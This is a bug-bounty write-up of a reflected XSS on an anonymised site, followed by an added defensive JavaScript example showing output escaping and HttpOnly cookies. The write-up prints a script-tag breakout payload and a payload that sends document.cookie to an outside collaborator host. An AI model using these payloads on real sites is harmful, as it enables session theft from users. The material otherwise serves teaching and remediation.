XSS Steal Cookies
Hello hackers, I'm Mostafa Elguerdawi. In this write-up I'll explain how I was able to steal users' cookies via XSS.
I'll refer to my target as target.com.
The first thing I always do is browse the application and try to understand how it works, by creating an account and performing some actions on it.
After creating a new account and browsing many pages, I found this endpoint: https://target.com/Panel?obs=Yes&idPanel=564&key=465&rOTree=Y&rn=
In the idPanel and key parameters I tried SQL injection, but it didn't work, so I decided to view the page's source code and I found this:
I thought: what about XSS in these parameters?
I tried idPanel first, but unfortunately it didn't work; the key parameter, however, had no filter.
I was able to inject an XSS payload into it. Now the real challenge.
The payload is reflected in the page source, but unfortunately it doesn't execute because it lands inside the function windowReload.
So I needed to escape this function and get out of it.
After spending some time trying to close the function and start a new one without any success, I thought: what if I closed the script tag itself, not only the function?
So I used the payload: "} </script><script>alert("XSS_By_Mostafa_Elguerdawi")</script>//
- "} : to escape the function
- </script> : to close the <script> tag from the original code
And it worked as I expected!!
Steal Users' Cookies
After getting the XSS, I tried to alert my cookie to see whether the HttpOnly flag was set or not; it wasn't, and I was able to read the cookies.
With some help from Burp Collaborator I managed to get anyone's cookie by sending them the URL.
The payload I used:
"} </script> <script>fetch('https://<Collaborator>', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>//
After a couple of seconds I got the callback on my Collaborator with the victim's cookies.
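As an added example (not code from the original write-up or from target.com), here are the two weaknesses above side by side from the fixing side: a constructed render that reflects the key parameter into the inline windowReload script the way the post describes, a hardened render that embeds the value as an escaped JS string literal so neither the "} nor the </script> part of the payload can break out, and a Set-Cookie builder that sets the HttpOnly flag the post found missing. The template, function names and cookie name are assumptions.

```javascript
// Added example, not the original write-up's or target.com's code.
// The template below is a constructed stand-in for the page's inline script
// that reflects the `key` parameter into the body of windowReload().

// Vulnerable render: the parameter is dropped verbatim inside a string
// literal in an inline <script>, so `"}` ends the string and the block, and
// `</script>` ends the script element itself (the HTML parser does not care
// that the tag appears inside a JS string).
function renderVulnerable(key) {
  return `<script>function windowReload(){ var k = "${key}"; }</script>`;
}

// Serialize a value as a JS string literal that is safe inside an inline
// <script>: JSON.stringify handles quotes and backslashes; the extra
// replacements make sure no `</script>`, HTML comment/entity sequence or
// raw line terminator (U+2028/U+2029, which JSON leaves unescaped) can
// appear in the output. JSON.parse of the result gives back the original.
function jsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened render: same page, value embedded through jsString().
function renderHardened(key) {
  return `<script>function windowReload(){ var k = ${jsString(key)}; }</script>`;
}

// Review/detection helper: a page that should carry exactly one inline
// script has been broken out of if more than one <script> opener is present.
function scriptTagCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Second fix, from the cookie section: a session cookie issued with HttpOnly
// is not readable through document.cookie, so even a working XSS cannot
// exfiltrate it this way. The cookie name is an assumption.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// The alert payload from the write-up, as a constructed sample input.
const PAYLOAD = '"} </script><script>alert("XSS_By_Mostafa_Elguerdawi")</script>//';
```

Running renderVulnerable(PAYLOAD) yields two <script> openers (the breakout succeeded), while renderHardened(PAYLOAD) yields one and the payload survives only as an inert string.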